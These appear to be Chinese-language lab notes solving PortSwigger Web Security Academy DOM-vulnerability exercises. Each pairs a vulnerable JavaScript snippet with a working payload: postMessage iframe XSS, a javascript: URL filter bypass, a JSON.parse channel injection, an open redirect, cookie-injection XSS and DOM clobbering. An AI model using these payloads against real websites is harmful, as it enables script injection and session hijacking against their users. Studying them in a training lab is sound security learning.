使用网络消息的 DOM XSS
<script> window.addEventListener('message', function (e) { document.getElementById('ads').innerHTML = e.data; }) </script>
|
IFrame消息传递
http://runxinzhi.com/ms-grf-p-11545290.html
<iframe src="https://0a2f00890488e7a6c0f2c14d008b00e0.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
|
使用网络消息和 JavaScript URL 的 DOM XSS
<script> window.addEventListener('message', function (e) { var url = e.data; if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) { location.href = url; } }, false); </script>
|
这里做了过滤 但是有缺陷
<iframe src="https://0a21004d04ed6de4c03702320011003f.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')"></iframe>
|
DOM XSS 使用网络消息和JSON.parse
<script> window.addEventListener('message', function (e) { var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d; document.body.appendChild(iframe); try { d = JSON.parse(e.data); } catch (e) { return; } switch (d.type) { case "page-load": ACMEplayer.element.scrollIntoView(); break; case "load-channel": ACMEplayer.element.src = d.url; break; case "player-height-changed": ACMEplayer.element.style.width = d.width + "px"; ACMEplayer.element.style.height = d.height + "px"; break; } }, false); </script>
|
<iframe src=https://0a3200ce04cdb6cdc0af6734007c006d.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'></iframe>
|
基于 DOM 的开放式重定向
https://0a39001b0312d431c0493d9400b70041.web-security-academy.net/post?postId=1&url=https://exploit-0aaa00b803e9d4d3c0323fda01ab001b.exploit-server.net/
|
基于 DOM 的 cookie 操作
会将cookie填入url
<script> document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure' </script>
|
cookie中存在一个url 这里将url 填入了cookie中去 其中我们可以尝试出 ‘ 存在逃逸
<iframe src="https://0ac900e1049a54cdc054d67300df007f.web-security-academy.net/product?productId=2&'><script>print()</script>" onload="if(!window.x)this.src='https://exploit-0a5800e104835458c0ced85701d700b6.exploit-server.net/';window.x=1;">
|
利用 DOM 破坏来启用 XSS
<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:"onerror=alert(1)//">
|
破坏 DOM 属性以绕过 HTML 过滤器
<form onclick=alert(1)><input id=attributes>Click me
|
<iframe src=https://0aae0085044793c3c0c84cc700c000db.web-security-academy.net/post?postId=3 onload="setTimeout(()=>this.src=this.src+'#x',500)">
|